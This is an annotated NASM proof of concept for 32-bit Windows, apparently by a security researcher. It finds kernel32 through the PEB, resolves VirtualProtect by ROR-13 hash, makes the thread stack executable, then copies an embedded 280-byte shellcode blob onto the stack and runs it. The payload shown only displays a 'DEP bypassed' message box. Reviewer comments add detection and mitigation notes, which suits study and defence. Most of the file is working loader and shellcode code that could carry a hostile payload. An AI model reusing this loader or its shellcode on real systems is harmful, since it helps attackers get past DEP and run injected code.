; Brian Mariani High-Tech Bridge
; Finding Kernel32.dll base address
; Index to VirtualProtect
; Disabling NonExecute attributes in actual thread memory stack
; Injecting the payload in the stack and execute it
; Tested in Windows XP SP3 DEP AlwaysOn & Windows 7 Enterprise DEP AlwaysON
; Thanks to http://opc0de.tuxfamily.org/?p=430 for Kernel generic search
;
;-----------------------------------------------------------------------
; Review overview
; Syntax: NASM / Intel.  Target: 32-bit Windows PE.  Entry: stdcall
; _WinMain@16; its four arguments are never read.
;
; Self-contained proof of concept that runs entirely inside its own
; process.  Control flow:
;   1. whereis_kernel32  - kernel32.dll image base via PEB->Ldr walk
;   2. function_address  - VirtualProtect resolved from kernel32's export
;                          table by ROR-13 hashing of export names
;   3. VirtualProtect(StackLimit, StackBase-StackLimit, 0x40, &old)
;                        - whole current-thread stack -> PAGE_EXECUTE_READWRITE
;   4. copy the `shellcode` blob from .data onto the stack with PUSHes
;      and enter it with `call esp`
; Nothing here exploits a memory-safety bug: the process already controls
; its own execution, so the demo only shows that DEP by itself does not
; stop code that can call VirtualProtect on its own stack pages.
;
; Detection / mitigation notes (reviewer):
;   - High-signal events: VirtualProtect / NtProtectVirtualMemory with
;     lpAddress inside the calling thread's stack range and
;     flNewProtect = 0x40, followed by a control transfer into a stack
;     page.  API-monitoring and stack-pointer sanity checks catch both.
;   - PEB->Ldr walking plus ROR-13 export hashing is the classic
;     position-independent API-resolution pattern; hash constants such as
;     07946c61bh are commonly covered by static signatures.
;   - A process mitigation that forbids creating executable memory
;     (e.g. Arbitrary Code Guard) would be expected to make step 3 fail.
;
; Behaviour caveats visible in the code (left as-is, see per-line notes):
;   - whereis_kernel32 matches a module by name LENGTH only (12 UTF-16
;     chars), it never compares the name itself.
;   - function_address gives no "not found" indication; on a miss eax is
;     just restored by popad.
;   - The copy loop pushes shellcode+0x118 down to shellcode+4: it reads
;     one dword past the 0x118-byte blob and skips the blob's first dword
;     (harmless only because the blob starts with NOPs).
;   - The 8 bytes pushed for `call function_address` are never popped by
;     either side; tolerated because control never returns from the payload.
;-----------------------------------------------------------------------

section .text
global _WinMain@16

_WinMain@16:
        jmp     ep_                     ; hop over the two helper routines

;-----------------------------------------------------------------------
; whereis_kernel32
; Out:   eax = DllBase of the first entry in PEB->Ldr->
;        InInitializationOrderModuleList whose BaseDllName is exactly
;        12 UTF-16 characters ("kernel32.dll" on the tested systems)
; Clobb: ecx (left = 0), esi, edi, flags
; Note:  the test is "13th wide char == NUL"; any other 12-character
;        module name earlier in the list would be returned instead.
;-----------------------------------------------------------------------
whereis_kernel32:
        xor     ecx, ecx                ; ecx = 0; cl doubles as the NUL compared below
        mov     esi, [fs:ecx + 30h]     ; esi = TEB->ProcessEnvironmentBlock (fs:[0x30])
        mov     esi, [esi + 0ch]        ; esi = PEB->Ldr
        mov     esi, [esi + 1ch]        ; esi = Ldr->InInitializationOrderModuleList.Flink
search_another_module:
        mov     eax, [esi + 08h]        ; eax = DllBase (offset relative to the init-order link)
        mov     edi, [esi + 20h]        ; edi = BaseDllName.Buffer (UTF-16)
        mov     esi, [esi]              ; esi = next entry (Flink), before the name is checked
        cmp     [edi + 12 * 2], cl      ; is wide char #12 the terminator?  (name length == 12)
        jne     search_another_module
        ret                             ; eax still holds the DllBase of the matched entry

;-----------------------------------------------------------------------
; function_address  (caller pushes 2 args; neither side pops them)
; In:    [esp+4] = module image base
;        [esp+8] = ROR-13 hash of the wanted export name
; Out:   eax = VA of the export whose name hashes to that value;
;        unchanged (restored by popad) when no name matches
; Clobb: flags only; every general register is restored by popad
; Frame: after pushad, [esp+0x1c] = saved eax, [esp+0x20] = return
;        address, [esp+0x24] = arg1 (base), [esp+0x28] = arg2 (hash)
;-----------------------------------------------------------------------
function_address:
        pushad
        mov     ebp, [esp + 024h]       ; ebp = module base
        mov     eax, [ebp + 03ch]       ; eax = IMAGE_DOS_HEADER.e_lfanew
        mov     edx, [ebp + eax + 078h] ; edx = DataDirectory[0].VirtualAddress (export dir RVA)
        add     edx, ebp                ; edx = &IMAGE_EXPORT_DIRECTORY
        mov     ecx, [edx + 018h]       ; ecx = NumberOfNames
        mov     ebx, [edx + 020h]       ; ebx = AddressOfNames RVA
        add     ebx, ebp                ; ebx = &AddressOfNames[0]
find_func_address_loop:
        jecxz   find_address_done       ; every name tried, no hit
        dec     ecx                     ; walk the name table from the last entry downwards
        mov     esi, [ebx + ecx * 4]    ; esi = RVA of name[ecx]
        add     esi, ebp                ; esi = &name[ecx] (NUL-terminated ASCII)
Api_hash:
        xor     edi, edi                ; edi = running hash
        xor     eax, eax                ; upper bytes of eax stay 0 so `add edi, eax` adds one byte
        cld                             ; lodsb must walk forwards
hashing:
        lodsb                           ; al = *esi++
        test    al, al
        jz      hash_done               ; end of name
        ror     edi, 0dh                ; hash = ror(hash, 13) + byte
        add     edi, eax
        jmp     hashing
hash_done:
is_it_right_hash:
        cmp     edi, [esp + 028h]       ; compare with the requested hash
        jnz     find_func_address_loop
        mov     ebx, [edx + 024h]       ; ebx = AddressOfNameOrdinals RVA
        add     ebx, ebp
        mov     cx, [ebx + 2 * ecx]     ; cx = ordinal of name[ecx]; 16-bit write, relies on ecx < 0x10000
        mov     ebx, [edx + 01ch]       ; ebx = AddressOfFunctions RVA
        add     ebx, ebp
        mov     eax, [ebx + 4 * ecx]    ; eax = RVA of the function
        add     eax, ebp                ; eax = VA of the function
        mov     [esp + 01ch], eax       ; patch the eax slot of the pushad frame so popad returns it
find_address_done:
        popad
        ret                             ; does not pop the two arguments (see header)

;-----------------------------------------------------------------------
; ep_  -- real entry point.  Never returns; control ends in the payload.
; Stack: 12-byte scratch frame at ebp, one dword for lpflOldProtect,
;        then the 0x118-byte payload image built by the push loop.
;-----------------------------------------------------------------------
ep_:
        mov     eax,[FS:0x20]           ;Get Process ID (TEB->ClientId.UniqueProcess) - dead load, overwritten next line
        xor     eax,eax
        sub     esp, 12                 ; 12-byte scratch area
        mov     ebp, esp                ; ebp = scratch base
        call    whereis_kernel32        ; eax = kernel32 image base
        mov     edx, eax
        push    07946c61bh              ;VirtualProtectHash (ROR-13 hash of "VirtualProtect")
        push    edx                     ; module base
        call    function_address        ; eax = &kernel32!VirtualProtect; the 8 arg bytes stay on the stack
        mov     [ebp+4], eax            ; stash in scratch frame (not read again in this file)
        mov     esi,[fs:0x08]           ;Put in esi the bottom stack address of current thread (TEB->StackLimit)
        push    0x20                    ;Push old memory attributes -> the dword that receives lpflOldProtect
        lea     edi,[esp]               ; edi = &oldProtect slot
        push    edi                     ; arg4: lpflOldProtect
        push    0x40                    ;Push new memory attributes -> arg3: PAGE_EXECUTE_READWRITE
        mov     ebx, [fs:0x08]          ;Calculate actual thread stack size: ebx = StackLimit
        mov     edi, [fs:0x04]          ; edi = TEB->StackBase
        sub     edi,ebx                 ; edi = StackBase - StackLimit
        push    edi                     ;Push memory size -> arg2: dwSize
        push    esi                     ;bottom stack address -> arg1: lpAddress
        call    eax                     ;VirtualProtect (stdcall, callee pops the 4 args); return value is not checked
        xor     ecx,ecx                 ; Set counter to zero (redundant, overwritten two lines down)
        xor     eax,eax                 ; Set to zero (redundant, overwritten two lines down)
        mov     ecx,0x118               ; Shellcode size (280 bytes), used as the starting copy offset
        mov     eax,shellcode           ; Eax point to start of shellcode (absolute address; fine for non-PIC 32-bit)
.inject_shellcode_in_stack:
        cmp     ecx,0x0                 ; Is the shellcode injected in the stack?
        je      .execute                ; If Yes execute it
        push    dword [eax+ecx]         ; Push next dword: offsets 0x118, 0x114, ... , 4 (offset 0 never pushed, 0x118 is one past the end)
        sub     ecx,4                   ; Decrement counter
        jmp     .inject_shellcode_in_stack ; Loop until ecx = 0
.execute:
        ;int 3                          ; debugger break, left disabled
        call    esp                     ;Execute the payload from stack (esp = shellcode+4; the image runs contiguously upward)

[section .data]
; 0x118 (280) bytes of position-independent x86 payload.  From the bytes
; as written: ten leading NOPs, then the same PEB->Ldr walk and ROR-13
; export hashing seen in function_address above, and pushed ASCII
; fragments that spell "user32.dll", "MessageBox" and "DEP bypassed! :]".
; The hash constants 0xec0e4e8e, 0x73e2d87e and 0xbc4da2a8 appear to be
; the well-known ROR-13 hashes of LoadLibraryA, ExitProcess and
; MessageBoxA, i.e. a message-box demonstration payload.
shellcode db 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xd9,0xeb,0x9b,0xd9,0x74,0x24,0xf4,0x31,0xd2,0xb2,0x77,0x31,0xc9,0x64,0x8b,0x71,0x30,0x8b,0x76,0x0c,0x8b,0x76,0x1c,0x8b,0x46,0x08,0x8b,0x7e,0x20,0x8b,0x36,0x38,0x4f,0x18,0x75,0xf3,0x59,0x01,0xd1,0xff,0xe1,0x60,0x8b,0x6c,0x24,0x24,0x8b,0x45,0x3c,0x8b,0x54,0x28,0x78,0x01,0xea,0x8b,0x4a,0x18,0x8b,0x5a,0x20,0x01,0xeb,0xe3,0x34,0x49,0x8b,0x34,0x8b,0x01,0xee,0x31,0xff,0x31,0xc0,0xfc,0xac,0x84,0xc0,0x74,0x07,0xc1,0xcf,0x0d,0x01,0xc7,0xeb,0xf4,0x3b,0x7c,0x24,0x28,0x75,0xe1,0x8b,0x5a,0x24,0x01,0xeb,0x66,0x8b,0x0c,0x4b,0x8b,0x5a,0x1c,0x01,0xeb,0x8b,0x04,0x8b,0x01,0xe8,0x89,0x44,0x24,0x1c,0x61,0xc3,0xb2,0x08,0x29,0xd4,0x89,0xe5,0x89,0xc2,0x68,0x8e,0x4e,0x0e,0xec,0x52,0xe8,0x9f,0xff,0xff,0xff,0x89,0x45,0x04,0xbb,0x7e,0xd8,0xe2,0x73,0x87,0x1c,0x24,0x52,0xe8,0x8e,0xff,0xff,0xff,0x89,0x45,0x08,0x68,0x6c,0x6c,0x20,0x41,0x68,0x33,0x32,0x2e,0x64,0x68,0x75,0x73,0x65,0x72,0x88,0x5c,0x24,0x0a,0x89,0xe6,0x56,0xff,0x55,0x04,0x89,0xc2,0x50,0xbb,0xa8,0xa2,0x4d,0xbc,0x87,0x1c,0x24,0x52,0xe8,0x61,0xff,0xff,0xff,0x68,0x6f,0x78,0x58,0x20,0x68,0x61,0x67,0x65,0x42,0x68,0x4d,0x65,0x73,0x73,0x31,0xdb,0x88,0x5c,0x24,0x0a,0x89,0xe3,0x68,0x58,0x20,0x20,0x20,0x68,0x21,0x20,0x3a,0x5d,0x68,0x73,0x73,0x65,0x64,0x68,0x62,0x79,0x70,0x61,0x68,0x44,0x45,0x50,0x20,0x31,0xc9,0x88,0x4c,0x24,0x10,0x89,0xe1,0x31,0xd2,0x52,0x53,0x51,0x52,0xff,0xd0,0x31,0xc0,0x50,0xff,0x55,0x08